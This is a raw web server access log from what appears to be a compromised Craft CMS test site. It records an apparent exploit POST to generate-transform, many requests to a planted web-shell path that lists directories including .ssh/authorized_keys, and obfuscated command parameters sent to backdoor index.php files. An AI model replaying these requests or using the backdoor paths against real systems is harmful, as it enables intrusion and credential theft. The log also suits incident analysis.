216.73.216.46 - - [21/Aug/2025:09:10:54 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fplugins HTTP/2.0" 200 1474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 89 0.003 "10257" "0.003" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:09:10:54 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 200 126 "https://test.newsite.space/admin/login" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0" "213.176.73.78" 1337 0.381 "157" "0.381" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:57 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2Ff7c78%2Ff7c78%2Fcache.php HTTP/2.0" 200 4779 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.003 "8002" "0.003" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:09:10:58 -0400] "GET /c057546adf31.php HTTP/2.0" 403 449 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0" "213.176.73.78" 1063 0.001 "859" "0.000" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:00 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2Fcec54a4c HTTP/2.0" 200 1485 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 106 0.003 "7944" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:03 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fcreocoder HTTP/2.0" 200 1403 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 104 0.003 "6666" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:06 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fcreocoder HTTP/2.0" 200 1387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 98 0.003 "6467" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:09 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fplugins%2Fcommerce-helcim HTTP/2.0" 200 1469 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.004 "7836" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:12 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Ftemplates%2Fhome HTTP/2.0" 200 1436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 102 0.003 "6685" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fcomposer HTTP/2.0" 200 1931 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 339 0.004 "27364" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fplugins%2Fassets HTTP/2.0" 200 1387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.003 "6601" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fassets%2F.%2Fjs HTTP/2.0" 200 1497 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 108 0.004 "9018" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.cache%2F.%2F.. HTTP/2.0" 200 1693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 71 0.004 "17860" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.ssh%2F..%2Fapps HTTP/2.0" 200 1351 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 72 0.003 "5892" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:33 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fcomposer HTTP/2.0" 200 1913 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 96 0.004 "26709" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:36 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fconfig%2Froutes.php HTTP/2.0" 200 1290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 105 0.003 "3549" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:39 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fstorage%2Fcomposer-backups HTTP/2.0" 200 1766 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 109 0.003 "29640" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:42 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fplugins%2Fcraft-content-buddy HTTP/2.0" 200 1584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.003 "12339" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:45 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.ssh%2F.%2Fauthorized_keys HTTP/2.0" 200 3298 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 315 0.004 "5617" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:48 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fsabberworm HTTP/2.0" 200 1400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 341 0.003 "6671" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:51 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fassets%2F.%2Flibs HTTP/2.0" 200 1642 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.003 "17391" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:54 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2F..%2F.config%2Fcomposer HTTP/2.0" 200 1401 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 317 0.004 "6130" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:11:57 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fpublic%2F70f7c HTTP/2.0" 200 1446 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 102 0.003 "7652" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:00 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2Fc57df74c HTTP/2.0" 200 1484 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.003 "7943" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:03 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fassets%2Flibs HTTP/2.0" 200 1635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 106 0.004 "17208" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:06 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2Flhhpcl.php HTTP/2.0" 200 37733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.010 "195488" "0.010" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:09 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2Flhhpcl.php HTTP/2.0" 200 37732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.008 "195487" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:12 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Ftasdev-au HTTP/2.0" 200 1403 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 104 0.003 "6674" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:15 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2F.%2Flhhpcl.php HTTP/2.0" 200 37741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.012 "195586" "0.012" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fconfig%2Fhtmlpurifier HTTP/2.0" 200 1420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 332 0.003 "6451" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fconfig%2Fhtmlpurifier HTTP/2.0" 200 1440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 106 0.004 "6752" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fcebe HTTP/2.0" 200 1390 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 100 0.004 "6569" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Ftasdev-au HTTP/2.0" 200 1382 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 94 0.003 "6373" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fcebe HTTP/2.0" 200 1375 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 93 0.003 "6370" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:33 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fcebe HTTP/2.0" 200 1368 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 90 0.003 "6268" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:36 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2F..%2F.. HTTP/2.0" 200 1102 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 70 0.004 "3169" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:39 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fether HTTP/2.0" 200 1369 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 94 0.004 "6363" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:42 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Fc57df74c HTTP/2.0" 200 1481 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.003 "7818" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:45 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fmodules%2Fassets%2F.. HTTP/2.0" 200 1489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 96 0.003 "9512" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:48 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fphpoption HTTP/2.0" 200 1370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 97 0.003 "6439" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:51 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fphpoption HTTP/2.0" 200 1387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 104 0.008 "6638" "0.008" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:09:12:52 -0400] "GET /files/2023-01-24/2023-01-24/index.php?ARRAY=7o2230223n313735353738353537302p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738313937302q6638373233386435616130386338343265383635356462353230613836643438222p2232223n223037333339616637663931386432313139623433643361366661373232643333222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p2262696r675s70617373223n2232362q33352q35372q36382q37382q38362q3136227q HTTP/2.0" 200 308 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/102.0" "62.164.177.242" 629 1.034 "963" "1.034" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:54 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Ftasdev-au HTTP/2.0" 200 1387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 98 0.003 "6475" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:12:57 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fphpoption HTTP/2.0" 200 1364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 94 0.003 "6337" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:00 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fmodules%2F.%2F.. HTTP/2.0" 200 1718 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 93 0.005 "19631" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:03 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fether HTTP/2.0" 200 1384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 101 0.003 "6562" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:06 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fmodules%2F.. HTTP/2.0" 200 1732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 100 0.003 "20136" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:09 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fether HTTP/2.0" 200 1359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 91 0.003 "6261" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:12 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Faed7ab4c HTTP/2.0" 200 1504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.003 "8262" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:15 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F70f7c%2F70f7c HTTP/2.0" 200 1517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 106 0.004 "10020" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.%2Flog HTTP/2.0" 200 1337 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 65 0.003 "5742" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.ssh%2F..%2Ftmp HTTP/2.0" 200 1360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 71 0.003 "5879" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Ff80c1dcc HTTP/2.0" 200 1501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.003 "8238" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F70f7c%2F.%2F70f7c HTTP/2.0" 200 1520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 109 0.003 "10160" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Faed7ab4c HTTP/2.0" 200 1501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.003 "8128" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:33 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F..%2Fplugins HTTP/2.0" 200 1506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 106 0.003 "10951" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:36 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2Flhhpcl.php HTTP/2.0" 200 37705 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 98 0.011 "195279" "0.011" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:39 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.gnupg%2F.. HTTP/2.0" 200 1691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 68 0.004 "17701" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:42 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.ssh%2F.%2F.. HTTP/2.0" 200 1693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 70 0.004 "17752" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:45 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Ff80c1dcc HTTP/2.0" 200 1498 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.003 "8104" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:48 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fassets%2Flibs HTTP/2.0" 200 1610 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 96 0.003 "16639" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:51 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fphpstan HTTP/2.0" 200 1385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 95 0.003 "6429" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:09:13:57 -0400] "GET /f7c78/f7c78/f7c78/index.php?ARRAY=7o2230223n313735353738353633362p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738323033362q3531396266626334356265363239663062643838663436343839316161663764222p2232223n223638363665336634663661626265373636353738663939646136336636666464222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p2262696r675s70617373223n2231372q34332q35372q36352q38302q38312q3235227q HTTP/2.0" 200 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3780 Safari/537.36 Edg/75.0.139" "62.164.177.242" 656 0.914 "905" "0.915" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:13:58 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fassets%2F.%2Fcss HTTP/2.0" 200 1636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 344 0.004 "15775" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:14:00 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Ff7c78%2F.. HTTP/2.0" 200 2112 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 105 0.004 "36642" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:14:03 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F5d88fcbb HTTP/2.0" 200 1499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 113 0.004 "8152" "0.003" "test.newsite.space"
